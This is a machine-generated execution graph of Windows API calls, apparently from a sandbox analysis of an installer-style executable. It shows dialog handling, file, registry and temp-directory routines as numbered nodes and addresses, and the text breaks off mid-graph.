                                                                                      execution_graph 3640 402340 3641 402acb 17 API calls 3640->3641 3642 402351 3641->3642 3643 402acb 17 API calls 3642->3643 3644 40235a 3643->3644 3645 402acb 17 API calls 3644->3645 3646 402364 GetPrivateProfileStringA 3645->3646 3647 401d41 GetDlgItem GetClientRect 3648 402acb 17 API calls 3647->3648 3649 401d71 LoadImageA SendMessageA 3648->3649 3650 402957 3649->3650 3651 401d8f DeleteObject 3649->3651 3651->3650 3652 404a44 GetDlgItem GetDlgItem 3653 404a96 7 API calls 3652->3653 3667 404cae 3652->3667 3654 404b39 DeleteObject 3653->3654 3655 404b2c SendMessageA 3653->3655 3656 404b42 3654->3656 3655->3654 3658 404b79 3656->3658 3660 405fc2 17 API calls 3656->3660 3657 404d92 3659 404e3e 3657->3659 3663 404ca1 3657->3663 3669 404deb SendMessageA 3657->3669 3661 40403f 18 API calls 3658->3661 3664 404e50 3659->3664 3665 404e48 SendMessageA 3659->3665 3666 404b5b SendMessageA SendMessageA 3660->3666 3662 404b8d 3661->3662 3668 40403f 18 API calls 3662->3668 3670 4040a6 8 API calls 3663->3670 3676 404e62 ImageList_Destroy 3664->3676 3677 404e69 3664->3677 3681 404e79 3664->3681 3665->3664 3666->3656 3667->3657 3684 404d1f 3667->3684 3705 404992 SendMessageA 3667->3705 3685 404b9b 3668->3685 3669->3663 3674 404e00 SendMessageA 3669->3674 3675 405034 3670->3675 3671 404d84 SendMessageA 3671->3657 3673 404fe8 3673->3663 3682 404ffa ShowWindow GetDlgItem ShowWindow 3673->3682 3680 404e13 3674->3680 3676->3677 3678 404e72 GlobalFree 3677->3678 3677->3681 3678->3681 3679 404c6f GetWindowLongA SetWindowLongA 3683 404c88 3679->3683 3690 404e24 SendMessageA 3680->3690 3681->3673 3697 404eb4 3681->3697 3710 404a12 3681->3710 3682->3663 3686 404ca6 3683->3686 3687 404c8e ShowWindow 3683->3687 3684->3657 3684->3671 3685->3679 3689 404bea SendMessageA 3685->3689 3691 404c69 3685->3691 3694 404c26 SendMessageA 3685->3694 3695 404c37 SendMessageA 3685->3695 3704 404074 SendMessageA 3686->3704 3703 404074 SendMessageA 3687->3703 3689->3685 3690->3659 3691->3679 3691->3683 3692 404ef8 3698 404fbe InvalidateRect 3692->3698 3702 404f6c SendMessageA SendMessageA 3692->3702 3694->3685 3695->3685 3697->3692 3699 404ee2 SendMessageA 3697->3699 3698->3673 3700 404fd4 3698->3700 3699->3692 3719 40494d 3700->3719 3702->3692 3703->3663 3704->3667 3706 4049f1 SendMessageA 3705->3706 3707 4049b5 GetMessagePos ScreenToClient SendMessageA 3705->3707 3709 4049e9 3706->3709 3708 4049ee 3707->3708 3707->3709 3708->3706 3709->3684 3722 405fa0 lstrcpynA 3710->3722 3712 404a25 3723 405efe wsprintfA 3712->3723 3714 404a2f 3715 40140b 2 API calls 3714->3715 3716 404a38 3715->3716 3724 405fa0 lstrcpynA 3716->3724 3718 404a3f 3718->3697 3725 404888 3719->3725 3721 404962 3721->3673 3722->3712 3723->3714 3724->3718 3726 40489e 3725->3726 3727 405fc2 17 API calls 3726->3727 3728 404902 3727->3728 3729 405fc2 17 API calls 3728->3729 3730 40490d 3729->3730 3731 405fc2 17 API calls 3730->3731 3732 404923 lstrlenA wsprintfA SetDlgItemTextA 3731->3732 3732->3721 2990 401746 2991 402acb 17 API calls 2990->2991 2992 40174d 2991->2992 2996 405b68 2992->2996 2994 401754 2995 405b68 2 API calls 2994->2995 2995->2994 2997 405b73 GetTickCount GetTempFileNameA 2996->2997 2998 405ba0 2997->2998 2999 405ba4 2997->2999 2998->2997 2998->2999 2999->2994 3733 401947 3734 402acb 17 API calls 3733->3734 3735 40194e lstrlenA 3734->3735 3736 40257d 3735->3736 3740 4025ca 3741 402aa9 17 API calls 3740->3741 3747 4025d4 3741->3747 3742 402642 3743 405bb1 ReadFile 3743->3747 3744 402644 3749 405efe wsprintfA 3744->3749 3746 402654 3746->3742 3748 40266a SetFilePointer 3746->3748 3747->3742 3747->3743 3747->3744 3747->3746 3748->3742 3749->3742 3025 40224b 3026 402acb 17 API calls 3025->3026 3027 402251 3026->3027 3028 402acb 17 API calls 3027->3028 3029 40225a 3028->3029 3030 402acb 17 API calls 3029->3030 3031 402263 3030->3031 3040 4062a3 FindFirstFileA 3031->3040 3034 402270 3036 4050c7 24 API calls 3034->3036 3035 40227d lstrlenA lstrlenA 3037 4050c7 24 API calls 3035->3037 3038 402278 3036->3038 3039 4022b9 SHFileOperationA 3037->3039 3039->3034 3039->3038 3041 40226c 3040->3041 3042 4062b9 FindClose 3040->3042 3041->3034 3041->3035 3042->3041 3750 4028cb 3751 402aa9 17 API calls 3750->3751 3752 4028d1 3751->3752 3753 402906 3752->3753 3754 40271c 3752->3754 3756 4028e3 3752->3756 3753->3754 3755 405fc2 17 API calls 3753->3755 3755->3754 3756->3754 3758 405efe wsprintfA 3756->3758 3758->3754 3759 4022cd 3760 4022d4 3759->3760 3764 4022e7 3759->3764 3761 405fc2 17 API calls 3760->3761 3762 4022e1 3761->3762 3763 4056bc MessageBoxIndirectA 3762->3763 3763->3764 3765 4044d1 3766 4044fd 3765->3766 3767 40450e 3765->3767 3826 4056a0 GetDlgItemTextA 3766->3826 3769 40451a GetDlgItem 3767->3769 3773 404579 3767->3773 3771 40452e 3769->3771 3770 404508 3774 40620a 5 API calls 3770->3774 3776 404542 SetWindowTextA 3771->3776 3781 4059d1 4 API calls 3771->3781 3772 40465d 3824 404807 3772->3824 3828 4056a0 GetDlgItemTextA 3772->3828 3773->3772 3777 405fc2 17 API calls 3773->3777 3773->3824 3774->3767 3779 40403f 18 API calls 3776->3779 3783 4045ed SHBrowseForFolderA 3777->3783 3778 40468d 3784 405a26 18 API calls 3778->3784 3785 40455e 3779->3785 3780 4040a6 8 API calls 3786 40481b 3780->3786 3782 404538 3781->3782 3782->3776 3790 405938 3 API calls 3782->3790 3783->3772 3787 404605 CoTaskMemFree 3783->3787 3788 404693 3784->3788 3789 40403f 18 API calls 3785->3789 3791 405938 3 API calls 3787->3791 3829 405fa0 lstrcpynA 3788->3829 3792 40456c 3789->3792 3790->3776 3793 404612 3791->3793 3827 404074 SendMessageA 3792->3827 3796 404649 SetDlgItemTextA 3793->3796 3801 405fc2 17 API calls 3793->3801 3796->3772 3797 404572 3799 406338 5 API calls 3797->3799 3798 4046aa 3800 406338 5 API calls 3798->3800 3799->3773 3808 4046b1 3800->3808 3802 404631 lstrcmpiA 3801->3802 3802->3796 3805 404642 lstrcatA 3802->3805 3803 4046ed 3830 405fa0 lstrcpynA 3803->3830 3805->3796 3806 4046f4 3807 4059d1 4 API calls 3806->3807 3809 4046fa GetDiskFreeSpaceA 3807->3809 3808->3803 3811 40597f 2 API calls 3808->3811 3813 404745 3808->3813 3812 40471e MulDiv 3809->3812 3809->3813 3811->3808 3812->3813 3814 4047b6 3813->3814 3816 40494d 20 API calls 3813->3816 3815 4047d9 3814->3815 3817 40140b 2 API calls 3814->3817 3831 404061 KiUserCallbackDispatcher 3815->3831 3818 4047a3 3816->3818 3817->3815 3820 4047b8 SetDlgItemTextA 3818->3820 3821 4047a8 3818->3821 3820->3814 3823 404888 20 API calls 3821->3823 3822 4047f5 3822->3824 3832 40442a 3822->3832 3823->3814 3824->3780 3826->3770 3827->3797 3828->3778 3829->3798 3830->3806 3831->3822 3833 404438 3832->3833 3834 40443d SendMessageA 3832->3834 3833->3834 3834->3824 3835 4020d1 3836 402acb 17 API calls 3835->3836 3837 4020d8 3836->3837 3838 402acb 17 API calls 3837->3838 3839 4020e2 3838->3839 3840 402acb 17 API calls 3839->3840 3841 4020ec 3840->3841 3842 402acb 17 API calls 3841->3842 3843 4020f6 3842->3843 3844 402acb 17 API calls 3843->3844 3846 402100 3844->3846 3845 402142 CoCreateInstance 3850 402161 3845->3850 3852 40220c 3845->3852 3846->3845 3847 402acb 17 API calls 3846->3847 3847->3845 3848 401423 24 API calls 3849 402242 3848->3849 3851 4021ec MultiByteToWideChar 3850->3851 3850->3852 3851->3852 3852->3848 3852->3849 3853 4026d4 3854 4026da 3853->3854 3855 4026de FindNextFileA 3854->3855 3858 4026f0 3854->3858 3856 40272f 3855->3856 3855->3858 3859 405fa0 lstrcpynA 3856->3859 3859->3858 3554 4023d6 3555 402acb 17 API calls 3554->3555 3556 4023e8 3555->3556 3557 402acb 17 API calls 3556->3557 3558 4023f2 3557->3558 3571 402b5b 3558->3571 3561 402427 3562 402433 3561->3562 3565 402aa9 17 API calls 3561->3565 3566 402452 RegSetValueExA 3562->3566 3568 402f9c 31 API calls 3562->3568 3563 402acb 17 API calls 3567 402420 lstrlenA 3563->3567 3564 40271c 3565->3562 3569 402468 RegCloseKey 3566->3569 3567->3561 3568->3566 3569->3564 3572 402b76 3571->3572 3575 405e54 3572->3575 3576 405e63 3575->3576 3577 402402 3576->3577 3578 405e6e RegCreateKeyExA 3576->3578 3577->3561 3577->3563 3577->3564 3578->3577 3860 4014d6 3861 402aa9 17 API calls 3860->3861 3862 4014dc Sleep 3861->3862 3864 402957 3862->3864 3579 401759 3580 402acb 17 API calls 3579->3580 3581 401760 3580->3581 3582 401786 3581->3582 3583 40177e 3581->3583 3619 405fa0 lstrcpynA 3582->3619 3618 405fa0 lstrcpynA 3583->3618 3586 401784 3589 40620a 5 API calls 3586->3589 3587 401791 3588 405938 3 API calls 3587->3588 3590 401797 lstrcatA 3588->3590 3592 4017a3 3589->3592 3590->3586 3591 4062a3 2 API calls 3591->3592 3592->3591 3593 405b14 2 API calls 3592->3593 3595 4017ba CompareFileTime 3592->3595 3596 40187e 3592->3596 3603 405fc2 17 API calls 3592->3603 3607 405fa0 lstrcpynA 3592->3607 3613 4056bc MessageBoxIndirectA 3592->3613 3616 401855 3592->3616 3617 405b39 GetFileAttributesA CreateFileA 3592->3617 3593->3592 3595->3592 3597 4050c7 24 API calls 3596->3597 3598 401888 3597->3598 3600 402f9c 31 API calls 3598->3600 3599 4050c7 24 API calls 3606 40186a 3599->3606 3601 40189b 3600->3601 3602 4018af SetFileTime 3601->3602 3604 4018c1 FindCloseChangeNotification 3601->3604 3602->3604 3603->3592 3605 4018d2 3604->3605 3604->3606 3608 4018d7 3605->3608 3609 4018ea 3605->3609 3607->3592 3610 405fc2 17 API calls 3608->3610 3611 405fc2 17 API calls 3609->3611 3614 4018df lstrcatA 3610->3614 3612 4018f2 3611->3612 3615 4056bc MessageBoxIndirectA 3612->3615 3613->3592 3614->3612 3615->3606 3616->3599 3616->3606 3617->3592 3618->3586 3619->3587 3865 401659 3866 402acb 17 API calls 3865->3866 3867 40165f 3866->3867 3868 4062a3 2 API calls 3867->3868 3869 401665 3868->3869 3870 401959 3871 402aa9 17 API calls 3870->3871 3872 401960 3871->3872 3873 402aa9 17 API calls 3872->3873 3874 40196d 3873->3874 3875 402acb 17 API calls 3874->3875 3876 401984 lstrlenA 3875->3876 3878 401994 3876->3878 3877 4019d4 3878->3877 3882 405fa0 lstrcpynA 3878->3882 3880 4019c4 3880->3877 3881 4019c9 lstrlenA 3880->3881 3881->3877 3882->3880 3883 401cda 3884 402aa9 17 API calls 3883->3884 3885 401ce0 IsWindow 3884->3885 3886 401a0e 3885->3886 3887 401a5e 3888 402aa9 17 API calls 3887->3888 3889 401a67 3888->3889 3890 402aa9 17 API calls 3889->3890 3891 401a0e 3890->3891 3892 401f61 3893 402acb 17 API calls 3892->3893 3894 401f68 3893->3894 3895 406338 5 API calls 3894->3895 3896 401f77 3895->3896 3897 401ff7 3896->3897 3898 401f8f GlobalAlloc 3896->3898 3898->3897 3899 401fa3 3898->3899 3900 406338 5 API calls 3899->3900 3901 401faa 3900->3901 3902 406338 5 API calls 3901->3902 3903 401fb4 3902->3903 3903->3897 3907 405efe wsprintfA 3903->3907 3905 401feb 3908 405efe wsprintfA 3905->3908 3907->3905 3908->3897 3909 402561 3910 402acb 17 API calls 3909->3910 3911 402568 3910->3911 3914 405b39 GetFileAttributesA CreateFileA 3911->3914 3913 402574 3914->3913 2800 401b63 2801 401bb4 2800->2801 2805 401b70 2800->2805 2802 401bb8 2801->2802 2803 401bdd GlobalAlloc 2801->2803 2815 401bf8 2802->2815 2819 405fa0 lstrcpynA 2802->2819 2820 405fc2 2803->2820 2804 4022d4 2807 405fc2 17 API calls 2804->2807 2805->2804 2808 401b87 2805->2808 2810 4022e1 2807->2810 2837 405fa0 lstrcpynA 2808->2837 2839 4056bc 2810->2839 2812 401bca GlobalFree 2812->2815 2814 401b96 2838 405fa0 lstrcpynA 2814->2838 2817 401ba5 2843 405fa0 lstrcpynA 2817->2843 2819->2812 2832 405fcf 2820->2832 2821 406206 2821->2815 2822 4061f1 2822->2821 2860 405fa0 lstrcpynA 2822->2860 2824 4061cb lstrlenA 2824->2832 2827 405fc2 10 API calls 2827->2824 2829 4060e7 GetSystemDirectoryA 2829->2832 2830 4060fa GetWindowsDirectoryA 2830->2832 2832->2822 2832->2824 2832->2827 2832->2829 2832->2830 2833 40612e SHGetSpecialFolderLocation 2832->2833 2834 405fc2 10 API calls 2832->2834 2835 406174 lstrcatA 2832->2835 2844 405e87 2832->2844 2849 40620a 2832->2849 2858 405efe wsprintfA 2832->2858 2859 405fa0 lstrcpynA 2832->2859 2833->2832 2836 406146 SHGetPathFromIDListA CoTaskMemFree 2833->2836 2834->2832 2835->2832 2836->2832 2837->2814 2838->2817 2840 4056d1 2839->2840 2841 40571d 2840->2841 2842 4056e5 MessageBoxIndirectA 2840->2842 2841->2815 2842->2841 2843->2815 2861 405e26 2844->2861 2847 405eea 2847->2832 2848 405ebb RegQueryValueExA RegCloseKey 2848->2847 2855 406216 2849->2855 2850 40627e 2851 406282 CharPrevA 2850->2851 2853 40629d 2850->2853 2851->2850 2852 406273 CharNextA 2852->2850 2852->2855 2853->2832 2855->2850 2855->2852 2856 406261 CharNextA 2855->2856 2857 40626e CharNextA 2855->2857 2865 405963 2855->2865 2856->2855 2857->2852 2858->2832 2859->2832 2860->2821 2862 405e35 2861->2862 2863 405e39 2862->2863 2864 405e3e RegOpenKeyExA 2862->2864 2863->2847 2863->2848 2864->2863 2866 405969 2865->2866 2867 40597c 2866->2867 2868 40596f CharNextA 2866->2868 2867->2855 2868->2866 3915 401563 3916 4028ff 3915->3916 3919 405efe wsprintfA 3916->3919 3918 402904 3919->3918 3920 4024e5 3921 402b0b 17 API calls 3920->3921 3922 4024ef 3921->3922 3923 402aa9 17 API calls 3922->3923 3924 4024f8 3923->3924 3925 402513 RegEnumKeyA 3924->3925 3926 40251f RegEnumValueA 3924->3926 3928 40271c 3924->3928 3927 402534 RegCloseKey 3925->3927 3926->3927 3927->3928 3930 40166a 3931 402acb 17 API calls 3930->3931 3932 401671 3931->3932 3933 402acb 17 API calls 3932->3933 3934 40167a 3933->3934 3935 402acb 17 API calls 3934->3935 3936 401683 MoveFileA 3935->3936 3937 401696 3936->3937 3938 40168f 3936->3938 3940 4062a3 2 API calls 3937->3940 3942 402242 3937->3942 3939 401423 24 API calls 3938->3939 3939->3942 3941 4016a5 3940->3941 3941->3942 3943 405d7f 36 API calls 3941->3943 3943->3938 3043 403b6b 3044 403b83 3043->3044 3045 403cbe 3043->3045 3044->3045 3046 403b8f 3044->3046 3047 403d0f 3045->3047 3048 403ccf GetDlgItem GetDlgItem 3045->3048 3049 403b9a SetWindowPos 3046->3049 3050 403bad 3046->3050 3052 403d69 3047->3052 3057 401389 2 API calls 3047->3057 3051 40403f 18 API calls 3048->3051 3049->3050 3054 403bb2 ShowWindow 3050->3054 3055 403bca 3050->3055 3056 403cf9 KiUserCallbackDispatcher 3051->3056 3053 40408b SendMessageA 3052->3053 3058 403cb9 3052->3058 3083 403d7b 3053->3083 3054->3055 3059 403bd2 DestroyWindow 3055->3059 3060 403bec 3055->3060 3114 40140b 3056->3114 3062 403d41 3057->3062 3063 403fc8 3059->3063 3064 403bf1 SetWindowLongA 3060->3064 3065 403c02 3060->3065 3062->3052 3066 403d45 SendMessageA 3062->3066 3063->3058 3074 403ff9 ShowWindow 3063->3074 3064->3058 3069 403cab 3065->3069 3070 403c0e GetDlgItem 3065->3070 3066->3058 3067 40140b 2 API calls 3067->3083 3068 403fca DestroyWindow EndDialog 3068->3063 3073 4040a6 8 API calls 3069->3073 3071 403c21 SendMessageA IsWindowEnabled 3070->3071 3072 403c3e 3070->3072 3071->3058 3071->3072 3076 403c4b 3072->3076 3077 403c92 SendMessageA 3072->3077 3078 403c5e 3072->3078 3088 403c43 3072->3088 3073->3058 3074->3058 3075 405fc2 17 API calls 3075->3083 3076->3077 3076->3088 3077->3069 3080 403c66 3078->3080 3081 403c7b 3078->3081 3079 404018 SendMessageA 3082 403c79 3079->3082 3086 40140b 2 API calls 3080->3086 3084 40140b 2 API calls 3081->3084 3082->3069 3083->3058 3083->3067 3083->3068 3083->3075 3085 40403f 18 API calls 3083->3085 3089 40403f 18 API calls 3083->3089 3105 403f0a DestroyWindow 3083->3105 3087 403c82 3084->3087 3085->3083 3086->3088 3087->3069 3087->3088 3088->3079 3090 403df6 GetDlgItem 3089->3090 3091 403e13 ShowWindow KiUserCallbackDispatcher 3090->3091 3092 403e0b 3090->3092 3117 404061 KiUserCallbackDispatcher 3091->3117 3092->3091 3094 403e3d EnableWindow 3099 403e51 3094->3099 3095 403e56 GetSystemMenu EnableMenuItem SendMessageA 3096 403e86 SendMessageA 3095->3096 3095->3099 3096->3099 3099->3095 3118 404074 SendMessageA 3099->3118 3119 403b4c 3099->3119 3122 405fa0 lstrcpynA 3099->3122 3101 403eb5 lstrlenA 3102 405fc2 17 API calls 3101->3102 3103 403ec6 SetWindowTextA 3102->3103 3104 401389 2 API calls 3103->3104 3104->3083 3105->3063 3106 403f24 CreateDialogParamA 3105->3106 3106->3063 3107 403f57 3106->3107 3108 40403f 18 API calls 3107->3108 3109 403f62 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3108->3109 3110 401389 2 API calls 3109->3110 3111 403fa8 3110->3111 3111->3058 3112 403fb0 ShowWindow 3111->3112 3113 40408b SendMessageA 3112->3113 3113->3063 3115 401389 2 API calls 3114->3115 3116 401420 3115->3116 3116->3047 3117->3094 3118->3099 3120 405fc2 17 API calls 3119->3120 3121 403b5a SetWindowTextA 3120->3121 3121->3099 3122->3101 3944 4019ed 3945 402acb 17 API calls 3944->3945 3946 4019f4 3945->3946 3947 402acb 17 API calls 3946->3947 3948 4019fd 3947->3948 3949 401a04 lstrcmpiA 3948->3949 3950 401a16 lstrcmpA 3948->3950 3951 401a0a 3949->3951 3950->3951 3952 40156f 3953 401586 3952->3953 3954 40157f ShowWindow 3952->3954 3955 401594 ShowWindow 3953->3955 3956 402957 3953->3956 3954->3953 3955->3956 3526 402473 3537 402b0b 3526->3537 3529 402acb 17 API calls 3530 402486 3529->3530 3531 402490 RegQueryValueExA 3530->3531 3536 40271c 3530->3536 3532 4024b0 3531->3532 3533 4024b6 RegCloseKey 3531->3533 3532->3533 3542 405efe wsprintfA 3532->3542 3533->3536 3538 402acb 17 API calls 3537->3538 3539 402b22 3538->3539 3540 405e26 RegOpenKeyExA 3539->3540 3541 40247d 3540->3541 3541->3529 3542->3533 3543 4036f4 3544 40370c 3543->3544 3545 4036fe CloseHandle 3543->3545 3550 403739 3544->3550 3545->3544 3548 405768 67 API calls 3549 40371d 3548->3549 3551 403747 3550->3551 3552 403711 3551->3552 3553 40374c FreeLibrary GlobalFree 3551->3553 3552->3548 3553->3552 3553->3553 3957 4014f4 SetForegroundWindow 3958 402957 3957->3958 3959 404175 lstrcpynA lstrlenA 3960 401cfb 3961 402aa9 17 API calls 3960->3961 3962 401d02 3961->3962 3963 402aa9 17 API calls 3962->3963 3964 401d0e GetDlgItem 3963->3964 3965 40257d 3964->3965 3966 402c7c 3967 402ca4 3966->3967 3968 402c8b SetTimer 3966->3968 3969 402cf9 3967->3969 3970 402cbe MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3967->3970 3968->3967 3970->3969 3971 4022fc 3972 402304 3971->3972 3973 40230a 3971->3973 3974 402acb 17 API calls 3972->3974 3975 40231a 3973->3975 3976 402acb 17 API calls 3973->3976 3974->3973 3977 402328 3975->3977 3978 402acb 17 API calls 3975->3978 3976->3975 3979 402acb 17 API calls 3977->3979 3978->3977 3980 402331 WritePrivateProfileStringA 3979->3980 3981 4018fd 3982 401934 3981->3982 3983 402acb 17 API calls 3982->3983 3984 401939 3983->3984 3985 405768 67 API calls 3984->3985 3986 401942 3985->3986 3987 4026fe 3988 402acb 17 API calls 3987->3988 3989 402705 FindFirstFileA 3988->3989 3990 402728 3989->3990 3994 402718 3989->3994 3991 40272f 3990->3991 3995 405efe wsprintfA 3990->3995 3996 405fa0 lstrcpynA 3991->3996 3995->3991 3996->3994 3997 401000 3998 401037 BeginPaint GetClientRect 3997->3998 3999 40100c DefWindowProcA 3997->3999 4001 4010f3 3998->4001 4002 401179 3999->4002 4003 401073 CreateBrushIndirect FillRect DeleteObject 4001->4003 4004 4010fc 4001->4004 4003->4001 4005 401102 CreateFontIndirectA 4004->4005 4006 401167 EndPaint 4004->4006 4005->4006 4007 401112 6 API calls 4005->4007 4006->4002 4007->4006 4008 401900 4009 402acb 17 API calls 4008->4009 4010 401907 4009->4010 4011 4056bc MessageBoxIndirectA 4010->4011 4012 401910 4011->4012 4013 402381 4014 4023b3 4013->4014 4015 402388 4013->4015 4017 402acb 17 API calls 4014->4017 4016 402b0b 17 API calls 4015->4016 4018 40238f 4016->4018 4019 4023ba 4017->4019 4021 402acb 17 API calls 4018->4021 4023 4023c7 4018->4023 4024 402b89 4019->4024 4022 4023a0 RegDeleteValueA RegCloseKey 4021->4022 4022->4023 4025 402b95 4024->4025 4026 402b9c 4024->4026 4025->4023 4026->4025 4028 402bcd 4026->4028 4029 405e26 RegOpenKeyExA 4028->4029 4030 402bfb 4029->4030 4031 402c21 RegEnumKeyA 4030->4031 4032 402c38 RegCloseKey 4030->4032 4034 402c59 RegCloseKey 4030->4034 4036 402bcd 6 API calls 4030->4036 4038 402c4c 4030->4038 4031->4030 4031->4032 4033 406338 5 API calls 4032->4033 4035 402c48 4033->4035 4034->4038 4037 402c69 RegDeleteKeyA 4035->4037 4035->4038 4036->4030 4037->4038 4038->4025 4039 401502 4040 40151d 4039->4040 4041 40150a 4039->4041 4042 402aa9 17 API calls 4041->4042 4042->4040 2869 402003 2870 402015 2869->2870 2871 4020c3 2869->2871 2887 402acb 2870->2887 2873 401423 24 API calls 2871->2873 2880 402242 2873->2880 2875 402acb 17 API calls 2876 402025 2875->2876 2877 40203a LoadLibraryExA 2876->2877 2878 40202d GetModuleHandleA 2876->2878 2877->2871 2879 40204a GetProcAddress 2877->2879 2878->2877 2878->2879 2881 402096 2879->2881 2882 402059 2879->2882 2896 4050c7 2881->2896 2885 402069 2882->2885 2893 401423 2882->2893 2885->2880 2886 4020b7 FreeLibrary 2885->2886 2886->2880 2888 402ad7 2887->2888 2889 405fc2 17 API calls 2888->2889 2890 402af8 2889->2890 2891 40201c 2890->2891 2892 40620a 5 API calls 2890->2892 2891->2875 2892->2891 2894 4050c7 24 API calls 2893->2894 2895 401431 2894->2895 2895->2885 2897 4050e2 2896->2897 2906 405185 2896->2906 2898 4050ff lstrlenA 2897->2898 2899 405fc2 17 API calls 2897->2899 2900 405128 2898->2900 2901 40510d lstrlenA 2898->2901 2899->2898 2903 40513b 2900->2903 2904 40512e SetWindowTextA 2900->2904 2902 40511f lstrcatA 2901->2902 2901->2906 2902->2900 2905 405141 SendMessageA SendMessageA SendMessageA 2903->2905 2903->2906 2904->2903 2905->2906 2906->2885 4043 402583 4044 402588 4043->4044 4045 40259c 4043->4045 4046 402aa9 17 API calls 4044->4046 4047 402acb 17 API calls 4045->4047 4048 402591 4046->4048 4049 4025a3 lstrlenA 4047->4049 4050 405be0 WriteFile 4048->4050 4051 4025c5 4048->4051 4049->4048 4050->4051 2907 405205 2908 4053b0 2907->2908 2909 405227 GetDlgItem GetDlgItem GetDlgItem 2907->2909 2910 4053e0 2908->2910 2911 4053b8 GetDlgItem CreateThread FindCloseChangeNotification 2908->2911 2953 404074 SendMessageA 2909->2953 2914 40540e 2910->2914 2915 4053f6 ShowWindow ShowWindow 2910->2915 2916 40542f 2910->2916 2911->2910 2976 405199 OleInitialize 2911->2976 2913 405297 2919 40529e GetClientRect GetSystemMetrics SendMessageA SendMessageA 2913->2919 2917 405416 2914->2917 2918 405469 2914->2918 2958 404074 SendMessageA 2915->2958 2962 4040a6 2916->2962 2921 405442 ShowWindow 2917->2921 2922 40541e 2917->2922 2918->2916 2926 405476 SendMessageA 2918->2926 2924 4052f0 SendMessageA SendMessageA 2919->2924 2925 40530c 2919->2925 2928 405462 2921->2928 2929 405454 2921->2929 2959 404018 2922->2959 2924->2925 2931 405311 SendMessageA 2925->2931 2932 40531f 2925->2932 2933 40543b 2926->2933 2934 40548f CreatePopupMenu 2926->2934 2930 404018 SendMessageA 2928->2930 2935 4050c7 24 API calls 2929->2935 2930->2918 2931->2932 2954 40403f 2932->2954 2936 405fc2 17 API calls 2934->2936 2935->2928 2938 40549f AppendMenuA 2936->2938 2940 4054d0 TrackPopupMenu 2938->2940 2941 4054bd GetWindowRect 2938->2941 2939 40532f 2942 405338 ShowWindow 2939->2942 2943 40536c GetDlgItem SendMessageA 2939->2943 2940->2933 2944 4054ec 2940->2944 2941->2940 2945 40535b 2942->2945 2946 40534e ShowWindow 2942->2946 2943->2933 2947 405393 SendMessageA SendMessageA 2943->2947 2948 40550b SendMessageA 2944->2948 2957 404074 SendMessageA 2945->2957 2946->2945 2947->2933 2948->2948 2949 405528 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2948->2949 2951 40554a SendMessageA 2949->2951 2951->2951 2952 40556c GlobalUnlock SetClipboardData CloseClipboard 2951->2952 2952->2933 2953->2913 2955 405fc2 17 API calls 2954->2955 2956 40404a SetDlgItemTextA 2955->2956 2956->2939 2957->2943 2958->2914 2960 404025 SendMessageA 2959->2960 2961 40401f 2959->2961 2960->2916 2961->2960 2963 404169 2962->2963 2964 4040be GetWindowLongA 2962->2964 2963->2933 2964->2963 2965 4040d3 2964->2965 2965->2963 2966 404100 GetSysColor 2965->2966 2967 404103 2965->2967 2966->2967 2968 404113 SetBkMode 2967->2968 2969 404109 SetTextColor 2967->2969 2970 404131 2968->2970 2971 40412b GetSysColor 2968->2971 2969->2968 2972 404138 SetBkColor 2970->2972 2973 404142 2970->2973 2971->2970 2972->2973 2973->2963 2974 404155 DeleteObject 2973->2974 2975 40415c CreateBrushIndirect 2973->2975 2974->2975 2975->2963 2983 40408b 2976->2983 2978 4051bc 2982 4051e3 2978->2982 2986 401389 2978->2986 2979 40408b SendMessageA 2980 4051f5 OleUninitialize 2979->2980 2982->2979 2984 4040a3 2983->2984 2985 404094 SendMessageA 2983->2985 2984->2978 2985->2984 2988 401390 2986->2988 2987 4013fe 2987->2978 2988->2987 2989 4013cb MulDiv SendMessageA 2988->2989 2989->2988 4052 402688 4053 402904 4052->4053 4054 40268f 4052->4054 4055 402aa9 17 API calls 4054->4055 4056 402696 4055->4056 4057 4026a5 SetFilePointer 4056->4057 4057->4053 4058 4026b5 4057->4058 4060 405efe wsprintfA 4058->4060 4060->4053 3000 401c0a 3022 402aa9 3000->3022 3002 401c11 3003 402aa9 17 API calls 3002->3003 3004 401c1e 3003->3004 3005 401c33 3004->3005 3006 402acb 17 API calls 3004->3006 3007 402acb 17 API calls 3005->3007 3011 401c43 3005->3011 3006->3005 3007->3011 3008 401c9a 3010 402acb 17 API calls 3008->3010 3009 401c4e 3012 402aa9 17 API calls 3009->3012 3013 401c9f 3010->3013 3011->3008 3011->3009 3014 401c53 3012->3014 3016 402acb 17 API calls 3013->3016 3015 402aa9 17 API calls 3014->3015 3017 401c5f 3015->3017 3018 401ca8 FindWindowExA 3016->3018 3019 401c8a SendMessageA 3017->3019 3020 401c6c SendMessageTimeoutA 3017->3020 3021 401cc6 3018->3021 3019->3021 3020->3021 3023 405fc2 17 API calls 3022->3023 3024 402abe 3023->3024 3024->3002 4061 40448a 4062 4044c0 4061->4062 4063 40449a 4061->4063 4065 4040a6 8 API calls 4062->4065 4064 40403f 18 API calls 4063->4064 4066 4044a7 SetDlgItemTextA 4064->4066 4067 4044cc 4065->4067 4066->4062 3131 40320c SetErrorMode GetVersion 3132 40324d 3131->3132 3133 403253 3131->3133 3134 406338 5 API calls 3132->3134 3221 4062ca GetSystemDirectoryA 3133->3221 3134->3133 3136 403269 lstrlenA 3136->3133 3137 403278 3136->3137 3224 406338 GetModuleHandleA 3137->3224 3140 406338 5 API calls 3141 403286 3140->3141 3142 406338 5 API calls 3141->3142 3143 403292 #17 OleInitialize SHGetFileInfoA 3142->3143 3230 405fa0 lstrcpynA 3143->3230 3146 4032de GetCommandLineA 3231 405fa0 lstrcpynA 3146->3231 3148 4032f0 3149 405963 CharNextA 3148->3149 3150 403319 CharNextA 3149->3150 3156 403329 3150->3156 3151 4033f3 3152 403406 GetTempPathA 3151->3152 3232 4031db 3152->3232 3154 40341e 3157 403422 GetWindowsDirectoryA lstrcatA 3154->3157 3158 403478 DeleteFileA 3154->3158 3155 405963 CharNextA 3155->3156 3156->3151 3156->3155 3161 4033f5 3156->3161 3160 4031db 12 API calls 3157->3160 3242 402d63 GetTickCount GetModuleFileNameA 3158->3242 3163 40343e 3160->3163 3326 405fa0 lstrcpynA 3161->3326 3162 40348c 3164 403526 ExitProcess OleUninitialize 3162->3164 3168 403512 3162->3168 3173 405963 CharNextA 3162->3173 3163->3158 3166 403442 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3163->3166 3169 40365a 3164->3169 3170 40353c 3164->3170 3167 4031db 12 API calls 3166->3167 3171 403470 